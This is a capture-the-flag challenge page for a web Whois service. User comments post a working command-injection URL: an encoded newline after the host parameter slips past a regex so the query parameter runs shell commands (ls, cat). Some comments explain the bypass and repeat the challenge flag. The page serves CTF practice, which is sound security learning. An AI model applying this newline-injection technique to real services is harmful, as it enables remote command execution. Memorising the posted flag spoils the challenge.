WhoisWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 537
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
评论
MOCHAOLIN 11天前

(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf

回复 0

wj834722134 1月前

host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内

回复 0

Tao23 3月前

query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

to5ny 4月前

/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

xzs297995 5月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 1

xiaoxiao972521 5月前

/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

15614005380 7月前

1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕

回复 0

unknown237819 7月前

在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令

回复 2

868954104 8月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

vchopin 9月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

LLTVLL 攻破了该题 2天前
spbjzz 攻破了该题 3天前
571403685 攻破了该题 4天前
yvling 攻破了该题 7天前
guoce11 攻破了该题 7天前
差距从何而起 攻破了该题 7天前
happyd 攻破了该题 8天前
zzwen6 攻破了该题 9天前
CodeTracker 攻破了该题 10天前
oliver99 攻破了该题 10天前
tmk0 攻破了该题 10天前
gotest123 攻破了该题 11天前
sputnik 攻破了该题 11天前
MOCHAOLIN 攻破了该题 11天前
shiyaxiong 攻破了该题 12天前
奥尔 攻破了该题 13天前
EastWood12138 攻破了该题 13天前
叛逆者 攻破了该题 14天前
ir0nman 攻破了该题 14天前
13511852611 攻破了该题 14天前